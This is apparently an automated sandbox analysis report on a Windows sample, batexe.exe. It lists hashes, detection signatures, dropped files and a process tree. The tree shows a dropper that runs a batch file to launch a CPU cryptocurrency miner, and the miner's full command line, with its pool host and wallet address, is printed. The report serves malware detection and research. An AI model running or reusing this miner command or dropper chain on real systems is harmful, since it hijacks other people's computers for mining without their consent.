73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18/02/2024, 13:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3608	b2e.exe
3744	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe
3744	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3912-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 3608	3912	batexe.exe	72
PID 3912 wrote to memory of 3608	3912	batexe.exe	72
PID 3912 wrote to memory of 3608	3912	batexe.exe	72
PID 3608 wrote to memory of 4836	3608	b2e.exe	73
PID 3608 wrote to memory of 4836	3608	b2e.exe	73
PID 3608 wrote to memory of 4836	3608	b2e.exe	73
PID 4836 wrote to memory of 3744	4836	cmd.exe	76
PID 4836 wrote to memory of 3744	4836	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Users\Admin\AppData\Local\Temp\1095.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1095.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1095.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\18C3.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1095.tmp\b2e.exe

Filesize
3.3MB

MD5
0d4d8994aeee1eaaed72460f81419a7f

SHA1
479e9c59b9322b7d78423aac0dc07bc11c52ad64

SHA256
0db095364be448722e07adb6c0b43197b84ea37df5e1f2551aef2517c040defc

SHA512
37bf89b23369be2498c4688c5e9afbd7af3a35eb4fab1ec46e57310f3485fda7593f063b9fe78d9bfafab0d3a84641d0c380a0af19e914096e90835a09db8f09

Download Submit
C:\Users\Admin\AppData\Local\Temp\1095.tmp\b2e.exe

Filesize
2.9MB

MD5
f15725db8b7a7ee6ae4e6ba7dc74db57

SHA1
9577ab5f0855b017e5b10c56455cbae7379d3fb0

SHA256
947923aeba25f24fd51795b2586528a0c471142e54a572224e1c5a1c99496d44

SHA512
0acb2ad08924d93bb4887c8d5a38cf4e90b3dca91dd80d5677b5c47b9cfcecbb4468d9268453c3e02f04f4e3d7d41d51a7a7e4b40517a9e60b36dfc4339859e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\18C3.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.5MB

MD5
ef67af912bada51e947bc2d3c11b6ddf

SHA1
e818106dca02ff4afad1fbdcd01aa2ad4fca6f25

SHA256
c5b8484347016452d34774104327cd35dfa8f37641a0d5c6fe0170999fee8959

SHA512
1b380990d937f41deaa577833d83a8a5bab934beeb102bc54381d6be2559e450b055fc7cd9d1a72a70bbd267f1cb379d5c6880fa03cce5506d7b88e6426d4ae8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.9MB

MD5
638b119029f7eafe11ebe3d54ea35c27

SHA1
621a0f611c68f8839960388e91d6a5d4b340b508

SHA256
78bc31c994b647cee7c96922f8adf4b489693b826ef381ea885d333b6df3832f

SHA512
db6b48f55abc6f458936cff503b38a18df6db650683511c4514689f81951b3ee99f9fcb6b1e3c6d92c7746f0f5ff38498e5cee682e39a0230da06d0fec663329

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
aa8a3c495c09ecb6f7b8637c0b3167d2

SHA1
d3eb3921c58c888080175b96b611be5fe425e3d4

SHA256
859f706f4a0639a876229f655b6bbe454a9c231b27e0d813d6df347b306d1ffe

SHA512
34429971be4c0f1498ab1c80a670d2949ebfe50d3df2c44264c1954bd36b36fccad6fac3e0a7148e38cb306a18eea3a7903b15bf034d8b29f08599b0e40d1a44

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.3MB

MD5
65ec2d64d64ae97ad7a7fb97efcc4eff

SHA1
690f4dbc4a98907ebf0cca84d8fd2170b57161da

SHA256
3fc4674fbe5d03d36bb2c4b11d2d6ca8c756aa7040f9a0d15619c97779e7684a

SHA512
e2b1226db81422131c708019d92954f7230601391614b7e2c3b6834b098f4550a168c54bd801488a10f609f48b609f65fff86bcce74430b520441284d197bf45

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
991KB

MD5
3b0ffeb842af8a4126c2ba15a170a417

SHA1
278fcdd05e3eeb531c4c295ef5046b56b338e6bd

SHA256
1e113372e62bee34cdc02a38ac4659da34569d8ef3384f0738cd9cc1c02751b6

SHA512
d567db2d1024706029ab16bb611a0a8d0f537fd680c2ec8b610380942100eada2e8aaca706eac5748ab88d92b813611311e5bd2646d3bae813896edb3465815d

Download Submit
memory/3608-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3608-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3744-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3744-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/3744-44-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/3744-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3744-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3744-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3912-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download